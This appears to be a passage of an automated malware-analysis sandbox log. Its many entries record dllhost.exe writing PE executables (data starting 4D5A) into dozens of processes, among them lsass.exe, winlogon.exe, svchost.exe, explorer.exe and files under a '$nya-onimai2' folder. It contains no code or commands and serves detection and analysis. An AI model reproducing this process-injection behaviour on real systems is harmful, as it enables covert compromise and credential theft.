Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1080000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2FE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 26A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 27F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 27E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2E80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 22A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 10B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 26B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2A70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: FE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 28D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2980000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 29A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 28A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2F00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 13D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 680000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: F50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 6A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: D40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: B70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 6D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 10C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 870000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 2680000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 680000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\XCmjsBfYqbZctswsuVLwxRUiwMpfwrKsXHFJCckvdzIopegegV\fOwoBfUJekCciSaiYTfNNnZDeEwYl.exe base: 1400000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A8C180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 242BF650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2578F260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\cmd.exe base: 1B68BCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1E591C90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 1CA7D1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2134E420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 17D2DD20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F4B8F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 262F1CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23942AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF056A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2287AD70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B94DA60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25202540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9EBF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19FF1600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A76A170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D26990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2175D5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0AB960000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\$nya-onimai2\IhrFKM.exe base: 29FC5300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2129B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26384180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 25178730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\$nya-onimai2\IhrFKM.exe base: 29FC5610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 2A463AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22125DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 297A5D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D0F41C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C325340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AEFC900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 270F3530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D326280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 16131E60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AE137C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C93A3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2E4190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2AB68FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 265951C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2C263510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2234E100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18198570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1EF3C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 17ACFCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E8E330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5A2950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD340C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B653790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B19A0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24730B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15F35DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 200792F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18CE9170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D959540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18F1AC00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FF01350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 221D2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D400530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 8D00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27844DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 258B00D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA9A260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 1BFB71A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26982020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 185706E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1496A4A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 190043F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 16215D30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 159AD5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 221570C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B8E5260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 189090B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24BB1240000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 28182CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BD9B7A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 24261410000 value starts with: 4D5A
